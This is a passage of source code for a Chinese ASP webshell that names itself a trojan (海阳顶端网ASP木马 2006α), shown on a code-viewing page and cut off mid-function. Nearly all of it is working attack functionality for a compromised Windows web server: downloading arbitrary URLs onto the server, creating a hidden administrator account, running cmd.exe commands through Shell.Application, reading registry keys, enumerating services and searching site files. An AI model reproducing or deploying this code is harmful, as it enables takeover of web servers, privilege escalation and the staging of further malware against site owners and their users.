📄 123.asp
字号:
echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=readReg name=theAct>"
echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
echo "<input type=submit value=' 读取 '>"
echo "<span id=regeditInfo style='display:none;'><hr/>"
echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {禁止默认共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
echo "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}<br/>"
echo "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网关}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
echo "-----------OVER--------------------<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}<br/>"
echo "==========================================================<br/>以上资料由kEvin1986提供"
echo "</span>"
echo "</form><hr/>"
echo "<script language=vbs>" & vbNewLine
echo "sub main()" & vbNewLine
echo "base=document.all.text9.value" & vbNewLine
echo "If IsNumeric(base) Then" & vbNewLine
echo "cc=hex(cstr(base))" & vbNewLine
echo "alert(""10进制为""&base)" & vbNewLine
echo "alert(""16进制为""&cc)" & vbNewLine
echo "exit sub" & vbNewLine
echo "end if" & vbNewLine
echo "aa=asc(cstr(base))" & vbNewLine
echo "bb=hex(aa)" & vbNewLine
echo "alert(""10进制为""&aa)" & vbNewLine
echo "alert(""16进制为""&bb)" & vbNewLine
echo "end sub" & vbNewLine
echo "sub main2()" & vbNewLine
echo "If document.all.vars.value<>"""" Then" & vbNewLine
echo "Dim nums,tmp,tmpstr,i" & vbNewLine
echo "nums=document.all.vars.value" & vbNewLine
echo "nums_len=Len(nums)" & vbNewLine
echo "For i=1 To nums_len" & vbNewLine
echo "tmp=Mid(nums,i,1)" & vbNewLine
echo "If IsNumeric(tmp) Then" & vbNewLine
echo "tmp=tmp * 16 * (16^(nums_len-i-1))" & vbNewLine
echo "Else" & vbNewLine
echo "If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then" & vbNewLine
echo "alert(""你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。"")" & vbNewLine
echo "exit sub" & vbNewLine
echo "End If" & vbNewLine
echo "tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))" & vbNewLine
echo "End If" & vbNewLine
echo "tmpstr=tmpstr+tmp" & vbNewLine
echo "Next" & vbNewLine
echo "alert(""转换的10进制为:""&tmpstr&""其字符值为:""&chr(tmpstr))" & vbNewLine
echo "End If" & vbNewLine
echo "end sub" & vbNewLine
echo "</script>" & vbNewLine
echo "Powered By Marcos 2005.02"
End Sub
Sub downFromUrl()
If isDebugMode = False Then
On Error Resume Next
End If
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("Adodb.Stream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If overWrite <> 2 Then
overWrite = 1
End If
Http.Open "GET", theUrl, False
Http.Send()
If Http.ReadyState <> 4 Then
Exit Sub
End If
With stream
.Type = 1
.Mode = 3
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
.Close
End With
chkErr(Err)
alertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下载成功!")
Set Http = Nothing
Set Stream = Nothing
End Sub
Sub AddUser(strUser, strPassword)
If isDebugMode = False Then
On Error Resume Next
End If
Dim computer, theUser, theGroup
Set computer = Getobject("WinNT://.")
Set theGroup = GetObject("WinNT://./Administrators,group")
Set theUser = computer.Create("User", strUser)
theUser.SetPassword(strPassword)
chkErr(Err)
theUser.SetInfo
chkErr(Err)
theGroup.Add theUser
chkErr(Err)
Set theUser = Nothing
Set computer = Nothing
Set theGroup = Nothing
echo getUserInfo(strUser)
End Sub
Sub readReg()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, thePath, theArray
thePath = Request("thePath")
' echo thePath & "<br/>"
theArray = ws.RegRead(thePath)
If IsArray(theArray) Then
For i = 0 To UBound(theArray)
echo "<li>" & theArray(i)
Next
Else
echo "<li>" & theArray
End If
chkErr(Err)
End Sub
Sub PageList()
showTitle("功能模块列表")
echo "<base target=_blank>"
echo "海阳顶端网ASP木马@2006α<hr/>"
echo "<ol><li><a href='?pageName=ServiceList'>系统服务信息</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=infoAboutSrv'>服务器相关数据<br/>("
echo "<a href='?pageName=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录)</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=objOnSrv'>服务器组件探针</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=userList'>系统用户及用户组信息</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=CSInfo'>客户端服务器交互信息</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=WsCmdRun'>WScript.Shell程序运行器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=SaCmdRun'>Shell.Application程序运行器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=FsoFileExplorer'>FSO文件浏览操作器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=AppFileExplorer'>Shell.Application文件浏览操作器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=MsDataBase'>微软数据库查看/操作器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=TxtSearcher'>文本文件搜索器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=OtherTools'>一些零碎的小东西</a></li>"
echo "<br/></ol>"
echo "<hr/>Powered By Marcos 2005.02"
End Sub
Sub PageSaCmdRun()
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, thePath, theAct, appPath, appName, appArgs
showTitle("Shell.Application命令行操作")
theAct = Trim(Request("theAct"))
appPath = Trim(Request("appPath"))
thePath = Trim(Request("thePath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))
If theAct = "doAct" Then
If appName = "" Then
appName = "cmd.exe"
End If
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If
sa.ShellExecute appName, appArgs, appPath, "", 0
chkErr(Err)
End If
If theAct = "readResult" Then
Err.Clear
echo encode(streamLoadFromFile(aspPath))
If Err Then
Set theFile = fso.OpenTextFile(aspPath)
echo encode(theFile.ReadAll())
Set theFile = Nothing
End If
Response.End
End If
echo "<style>body{margin:8;border:none;background-color:buttonface;}</style>"
echo "<body onload=""document.forms[0].appArgs.focus();setTimeout('wsLoadIFrame();', 3900);"">"
echo "<form method=post onSubmit='this.Submit.disabled=true'>"
echo "<input type=hidden name=theAct value=doAct>"
echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
echo "所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>"
echo "程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
echo "<input type=button name=Submit4 value=' 回显 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""><br/> "
echo "命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
echo "<input type=submit name=Submit value=' 运行 '><br/>"
echo "<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>"
echo " 由于命令执行时间同网页刷新时间不同步,所以有些执行时间长的程序结果需要手动刷新下面的iframe才能得到.回显后记得删除临时文件.<hr/>"
echo "<iframe id=cmdResult style='width:100%;height:78%;'>"
echo "</iframe>"
echo "</form>"
echo "</body>"
End Sub
Sub PageServiceList()
Dim sa, objService, objComputer
showTitle("系统服务信息查看")
Set objComputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("Shell.Application")
objComputer.Filter = Array("Service")
echo "<ol>"
If isDebugMode = False Then
On Error Resume Next
End If
For Each objService In objComputer
echo "<li>" & objService.Name & "</li><hr/>"
echo "<ol>服务名称: " & objService.Name & "<br/>"
echo "显示名称: " & objService.DisplayName & "<br/>"
echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
' echo "当前状态: " & objService.Status & "<br/>"
' echo "服务类型: " & objService.ServiceType & "<br/>"
echo "登录身份: " & objService.ServiceAccountName & "<br/>"
echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
echo "文件路径及参数: " & objService.Path
echo "</ol><hr/>"
Next
echo "</ol><hr/>Powered By Marcos 2005.02"
Set sa = Nothing
End Sub
Function getServiceDsc(strService)
Dim ws
Set ws = Server.CreateObject("WScript.Shell")
getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
Set ws = Nothing
End Function
Sub PageTxtSearcher()
Response.Buffer = True
Server.ScriptTimeOut = 5000
Dim keyword, theAct, thePath, theFolder
theAct = Request("theAct")
keyword = Trim(Request("keyword"))
thePath = Trim(Request("thePath"))
showTitle("文本文件搜索器")
If thePath = "" Then
thePath = Server.MapPath("\")
End If
echo "FSO文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?pageName=TxtSearcher&theAct=fsoSearch onsubmit=this.Submit.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """ id=thePath size=61><br/>"
echo "关键字: <input name=keyword type=text value=""" & HtmlEncode(keyword) & """ id=keyword size=60>"
echo "<input type=submit name=Submit value=给我搜>"
echo "</form>"
echo "<hr/>"
echo "Shell.Application & Adodb.Stream文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?pageName=TxtSearcher&theAct=saSearch onsubmit=this.Submit2.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """ id=thePath size=61><br/>"
echo "关键字: <input name=keyword type=text value=""" & HtmlEncode(keyword) & """ id=keyword size=60>"
echo "<input type=submit name=Submit2 value=给我搜>"
echo "</form>"
echo "<hr/>"
If theAct = "fsoSearch" And keyword <> "" Then
Set theFolder = fso.GetFolder(thePath)
Call searchFolder(theFolder, keyword)
Set theFolder = Nothing
End If
If theAct = "saSearch" And keyword <> "" Then
Call appSearchIt(thePath, keyword)
End If
echo "<hr/>Powered By Marcos 2005.02"
End Sub
Sub searchFolder(folder, str)
Dim ext, title, theFile, theFolder
For Each theFile In folder.Files
ext = LCase(Split(theFile.Path, ".")(UBound(Split(theFile.Path, "."))))
If InStr(LCase(theFile.Name), LCase(str)) > 0 Then
echo fileLink(theFile, "")
End If
If ext = "asp" Or ext = "asa" Or ext = "cer" Or ext = "cdx" Then
If searchFile(theFile, str, title, "fso") Then
echo fileLink(theFile, title)
End If
End If
Next
Response.Flush()
For Each theFolder In folder.subFolders
searchFolder theFolder, str
Next
end sub
Function searchFile(f, s, title, metho⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -